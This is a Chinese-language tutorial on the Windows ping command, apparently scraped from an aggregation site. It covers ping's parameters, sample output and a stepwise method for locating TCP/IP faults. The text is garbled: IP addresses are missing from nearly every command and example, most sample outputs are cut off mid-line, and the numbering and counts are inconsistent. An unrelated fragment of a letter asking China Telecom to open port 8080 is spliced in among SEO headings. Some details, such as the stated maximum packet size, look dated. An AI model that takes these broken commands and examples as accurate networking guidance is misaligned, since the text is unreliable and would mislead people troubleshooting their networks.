Ping使用方法大全 首先從什么是Ping講起吧! 什么是Ping Ping是典型的網(wǎng)絡(luò)工具。Ping 是Windows系列自帶的一個(gè)可執(zhí)行命令,從98到最新的2003 Server版的計(jì)算機(jī)都帶有這個(gè)命令行工具。Ping能夠辨別網(wǎng)絡(luò)功能的某些狀態(tài)。這些網(wǎng)絡(luò)功能的狀態(tài)是日常網(wǎng)絡(luò)故障診斷的基礎(chǔ)。特別是Ping能夠識別連接的二進(jìn)制狀態(tài)(也就是是否連通)。Ping 命令通過向計(jì)算機(jī)發(fā)送 ICMP 回應(yīng)報(bào)文并且監(jiān)聽回應(yīng)報(bào)文的返回,以校驗(yàn)與遠(yuǎn)程計(jì)算機(jī)或本地計(jì)算機(jī)的連接。對于每個(gè)發(fā)送報(bào)文, Ping 最多等待 1 秒,并打印發(fā)送和接收把報(bào)文的數(shù)量。比較每個(gè)接收報(bào)文和發(fā)送報(bào)文,以校驗(yàn)其有效性。默認(rèn)情況下,發(fā)送四個(gè)回應(yīng)報(bào)文,每個(gè)報(bào)文包含 64 字節(jié)的數(shù)據(jù)。Ping向目標(biāo)主機(jī)(地址)發(fā)送一個(gè)回送請求數(shù)據(jù)包,要求目標(biāo)主機(jī)收到請求后給予答復(fù),從而判斷網(wǎng)絡(luò)的響應(yīng)時(shí)間和本機(jī)是否與目標(biāo)主機(jī)(地址)聯(lián)通。
Ping命令
校驗(yàn)與遠(yuǎn)程計(jì)算機(jī)或本地計(jì)算機(jī)的連接。只有在安裝 TCP/IP 協(xié)議之后才能使用該命令。(TCP/IP 協(xié)議應(yīng)該知道裝吧,裝系統(tǒng)時(shí)就有了,如果萬一刪了怎么辦?還能怎么辦,重新裝吧??!怎樣裝,以后再說。。呵呵~~~)
Ping ip [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
參數(shù) -t ( 校驗(yàn)與指定計(jì)算機(jī)的連接,直到用戶中斷。若要中斷可按快捷鍵:CTRL+C)
-a ( 將地址解析為計(jì)算機(jī)名。 )
-n count (發(fā)送由 count 指定數(shù)量的 ECHO 報(bào)文,默認(rèn)值為 4。 )
-l length (發(fā)送包含由 length 指定數(shù)據(jù)長度的 ECHO 報(bào)文。默認(rèn)值為 64 字節(jié),最大值為 8192 字節(jié)。)
-f (在包中發(fā)送“不分段”標(biāo)志。該包將不被路由上的網(wǎng)關(guān)分段。)
-i ttl (將“生存時(shí)間”字段設(shè)置為 ttl 指定的數(shù)值。其中:ttl: 表示從1到255之間的數(shù))
-v tos (將“服務(wù)類型”字段設(shè)置為 tos 指定的數(shù)值。 )
-r count (在“記錄路由”字段中記錄發(fā)出報(bào)文和返回報(bào)文的路由。指定的 Count 值最小可以是 1,最大可以是 9 。 ) 例:
c:\\\\Documents and Settings\\\\Administrator>ping -r 4 Pinging with 32 bytes of data: Reply from : bytes=32 time
Ping命令有兩種返回結(jié)果:
1、“Request timed out.”表示沒有收到目標(biāo)主機(jī)返回的響應(yīng)數(shù)據(jù)包,也就是網(wǎng)絡(luò)不通或網(wǎng)絡(luò)狀態(tài)惡劣
2、“Reply from : bytes=32 time
3、“Destination host unreachable”表示目標(biāo)主機(jī)無法到達(dá)
4、“PING: transmit failed,error code XXXXX”表示傳輸失敗,錯(cuò)誤代碼XXXXX
-s count (指定由 count 指定的轉(zhuǎn)發(fā)次數(shù)的時(shí)間郵票。其中指定的 Count 值最小可以是 1,最大可以是 4 。)
例:
c:\\\\Documents and Settings\\\\Administrator>ping -s 3 Pinging with 32 bytes of data: Reply from : bytes=32 time
-k computer-list (經(jīng)過由 computer-list 指定的計(jì)算機(jī)列表的路由報(bào)文。中間網(wǎng)關(guān)可能分隔連續(xù)的計(jì)算機(jī)(嚴(yán)格源路由)。允許的最大 IP 地址數(shù)目是 9 。)
-w timeout (以毫秒為單位指定超時(shí)間隔。 )
destination-list (指定要校驗(yàn)連接的遠(yuǎn)程計(jì)算機(jī))
使用PING判斷TCP/IP故障
可以使用 Ping 實(shí)用程序測試計(jì)算機(jī)名和 IP 地址。如果能夠成功校驗(yàn) IP 地址卻不能成功校驗(yàn)計(jì)算機(jī)名,則說明名稱解析存在問題。
1、Ping :
是本地循環(huán)地址,如果本地址無法Ping通,則表明本地機(jī)TCP/IP協(xié)議不能正常工作。
2、Ping本機(jī)的IP地址:
用IPConfig查看本機(jī)IP,然后Ping該IP,通則表明網(wǎng)絡(luò)適配器(網(wǎng)卡或MODEM)工作正常,不通則是網(wǎng)絡(luò)適配器出現(xiàn)故障。
3、Ping同網(wǎng)段計(jì)算機(jī)的IP:
Ping一臺(tái)同網(wǎng)段計(jì)算機(jī)的IP,不通則表明網(wǎng)絡(luò)線路出現(xiàn)故障;若網(wǎng)絡(luò)中還包含有路由器,則應(yīng)先Ping路由器在本網(wǎng)段端口的IP,不通則此段線路有問題;通則再PING路由器在目標(biāo)計(jì)算機(jī)所在網(wǎng)段的端口IP,不通則是路由出現(xiàn)故障;通則再Ping目的機(jī)IP地址。
4、Ping網(wǎng)址:
若要檢測一個(gè)帶DNS服務(wù)的網(wǎng)絡(luò),在上一步Ping通了目標(biāo)計(jì)算機(jī)的IP地址后,仍無法連接到該機(jī),則可PING該機(jī)的網(wǎng)絡(luò)名,比如Ping ,正常情況下會(huì)出現(xiàn)該網(wǎng)址所指向的IP,這表明本機(jī)的DNS設(shè)置正確而且DNS服務(wù)器工作正常,反之就可能是其中之一出現(xiàn)了故障;同樣也可通過Ping計(jì)算機(jī)名檢測WINS解析的故障(WINS是將計(jì)算機(jī)名解析到IP地址的服務(wù))。
利用Ping命令判定網(wǎng)絡(luò)故障 本機(jī)IP
例如本機(jī)IP地址為:。則執(zhí)行命令Ping 。如果網(wǎng)卡安裝配置沒有問題,則應(yīng)有類似下列顯示:
c:\\\\Documents and Settings\\\\Administrator>ping Pinging with 32 bytes of data: Reply from : bytes=32 time
網(wǎng)關(guān)IP
假定網(wǎng)關(guān)IP為:,則執(zhí)行命令Ping 。在MS-DOS方式下執(zhí)行此命令,如果顯示類似以下信息:
c:\\\\Documents and Settings\\\\Administrator>ping Pinging with 32 bytes of data: Reply from : bytes=32 time
這一命令可以檢測本機(jī)能否正常訪問Internet。比如本地電信運(yùn)營商的IP地址為:。在MS-DOS方式下執(zhí)行命令:Ping ,如果屏幕顯示:
c:\\\\Documents and Settings\\\\Administrator>ping Pinging with 32 bytes of data: Reply from : bytes=32 time=2ms TTL=250 Reply from : bytes=32 time=2ms TTL=250 Reply from : bytes=32 time=3ms TTL=250 Reply from : bytes=32 time=2ms TTL=250 Ping statistics for : Packets: Sent = 4, Received = 4, Lost = 0 (0% lo), Approximate round trip times in milli-seconds: Minimum = 2ms, Maximum = 3ms, Average = 2ms 則表明運(yùn)行正常,能夠正常接入互聯(lián)網(wǎng)。反之,則表明主機(jī)文件(windows/host)存在問題。
4.檢查您的計(jì)算機(jī)到網(wǎng)關(guān)之間的線路
在命令提示符窗口下輸入ipconfig命令,將返回您的計(jì)算機(jī)在網(wǎng)絡(luò)上的IP地址(IP Addre)、子網(wǎng)掩碼(Subnet Mask)及網(wǎng)關(guān)(Default Gateway),而在IP 如果您的計(jì)算機(jī)使用的是自動(dòng)獲取IP,adcre后面顯示的是的IP地址則您的計(jì)算機(jī)并沒有從DHCP服務(wù)器上獲取到可用的計(jì)算機(jī)IP地址。這時(shí)可以使用命令ipconfig /renew重新獲取一下IP(win98/me使用ipconfig/renew_all),一般情況下都可以獲取得正確的IP地址,當(dāng)然前提是DHCP服務(wù)器正常。如果一直獲取不到正確的IP地址,這時(shí)則要檢查一下是否防火墻軟件阻擋了網(wǎng)卡的通信,如Windows XP的防火墻。
獲取到正確的IP地址、子網(wǎng)掩碼及網(wǎng)關(guān)地址后,就可以使用Ping工具來探測本地計(jì)算機(jī)和網(wǎng)關(guān)之間是否連通了。運(yùn)行命令Ping 網(wǎng)關(guān)地址后,如果返回的結(jié)果正常,而IE依然打不開網(wǎng)頁,這個(gè)時(shí)候就應(yīng)該進(jìn)行第4步工作了。如果返回的結(jié)果不正常,則說明您的計(jì)算機(jī)和網(wǎng)關(guān)主機(jī)網(wǎng)絡(luò)不正常。此時(shí)如果是Adsl用戶則需要向運(yùn)營商打電話救助,讓他們檢查自己的服務(wù)器是否出現(xiàn)了故障。如果是局域網(wǎng)用戶,則需要向網(wǎng)管求助,讓他檢查網(wǎng)絡(luò)的交換設(shè)備及網(wǎng)關(guān)服務(wù)器是否工作正常。
從Ping的工作過程,我們可以知道,主機(jī)A收到了主機(jī)B的一個(gè)應(yīng)答包,說明兩臺(tái)主機(jī)之間的去、回通路均正常。也就是說,無論從主機(jī)A到主機(jī)B,還是從主機(jī)B到主機(jī)A,都是正常的。那么,是什么原因引起只能單方向Ping通的呢?
一、安裝了個(gè)人防火墻
在共享上網(wǎng)的機(jī)器中,出于安全考慮,大部分作為服務(wù)器的主機(jī)都安裝了個(gè)人防火墻軟件,而其他作為客戶機(jī)的機(jī)器則一般不安裝。幾乎所有的個(gè)人防火墻軟件,默認(rèn)情況下是不允許其他機(jī)器Ping本機(jī)的。一般的做法是將來自外部的ICMP請求報(bào)文濾掉,但它卻對本機(jī)出去的ICMP請求報(bào)文,以及來自外部的ICMP應(yīng)答報(bào)文不加任何限制。這樣,從本機(jī)Ping其他機(jī)器時(shí),如果網(wǎng)絡(luò)正常,就沒有問題。但如果從其他機(jī)器Ping這臺(tái)機(jī)器,即使網(wǎng)絡(luò)一切正常,也會(huì)出現(xiàn)“超時(shí)無應(yīng)答”的錯(cuò)誤。
二、錯(cuò)誤設(shè)置IP地址
正常情況下,一臺(tái)主機(jī)應(yīng)該有一個(gè)網(wǎng)卡,一個(gè)IP地址,或多個(gè)網(wǎng)卡,多個(gè)IP地址(這些地址一定要處于不同的IP子網(wǎng))。但對于在公共場所使用的電腦,特別是網(wǎng)吧,人多手雜,其中不泛有“探索者”。曾有一次兩臺(tái)電腦也出現(xiàn)了這種單方向Ping通的情況,經(jīng)過仔細(xì)檢查,發(fā)現(xiàn)其中一臺(tái)電腦的“撥號網(wǎng)絡(luò)適配器”(相當(dāng)于一塊軟網(wǎng)卡)的TCP/IP設(shè)置中,設(shè)置了一個(gè)與網(wǎng)卡IP地址處于同一子網(wǎng)的IP地址,這樣,在IP層協(xié)議看來,這臺(tái)主機(jī)就有兩個(gè)不同的接口處于同一網(wǎng)段內(nèi)。當(dāng)從這臺(tái)主機(jī)Ping其他的機(jī)器時(shí),會(huì)存在這樣的問題:
(1)主機(jī)不知道將數(shù)據(jù)包發(fā)到哪個(gè)網(wǎng)絡(luò)接口,因?yàn)橛袃蓚€(gè)網(wǎng)絡(luò)接口都連接在同一網(wǎng)段;
(2)主機(jī)不知道用哪個(gè)地址作為數(shù)據(jù)包的源地址。因此,從這臺(tái)主機(jī)去Ping其他機(jī)器,IP層協(xié)議會(huì)無法處理,超時(shí)后,Ping 就會(huì)給出一個(gè)“超時(shí)無應(yīng)答”的錯(cuò)誤信息提示。但從其他主機(jī)Ping這臺(tái)主機(jī)時(shí),請求包從特定的網(wǎng)卡來,ICMP只須簡單地將目的、源地址互換,并更改一些標(biāo)志即可,ICMP應(yīng)答包能順利發(fā)出,其他主機(jī)也就能成功Ping通這臺(tái)機(jī)器了。
ping端口號共5
申請書
中國電信:
茲有我公司辦公電腦遠(yuǎn)程需申請8080的端口,我公司服務(wù)器的IP是::8080
ping端口號共6
1 ping
通:操作系統(tǒng)TCP/IP功能完好
不通:重新給系統(tǒng)安裝TCP/IP(類Unix OS不會(huì)出現(xiàn)這種狀況)
2 ping 本地ip
使用DHCP時(shí),先使用ipconfig查看,若有ip,則正常,且說明局域網(wǎng)物理鏈路正常。此時(shí)ping這個(gè)ip,通則說明網(wǎng)卡工作正常。
不通:重新安裝網(wǎng)卡驅(qū)動(dòng)
3 ping 局域網(wǎng)其他機(jī)器(多ping幾臺(tái)機(jī)器)
通:局域網(wǎng)TCP/IP工作正常
不通:檢查線路
檢查Hub,Switcher
看對方機(jī)器是否將ICMP回應(yīng)關(guān)掉
4 ping 網(wǎng)關(guān)
通:到網(wǎng)關(guān)是OK的,如果不能上網(wǎng),那就是網(wǎng)關(guān)的問題(比如網(wǎng)關(guān)將此機(jī)器屏蔽,網(wǎng)關(guān)到Internet的鏈接有問題)
不通:按4檢查
(此時(shí),就可以上網(wǎng)了,QQ什么的就可以用了,因?yàn)檫@種東西一般直接用ip) 5 ping DNS
通:全部OK
不通:換一個(gè)DNS
本地DNS未設(shè)置(DHCP:沒有進(jìn)行DNS透傳,手動(dòng)設(shè)定吧)
ping端口號共6篇(Ping 端口號)相關(guān)文章:
相關(guān)熱詞搜索:ping端口號(共10篇)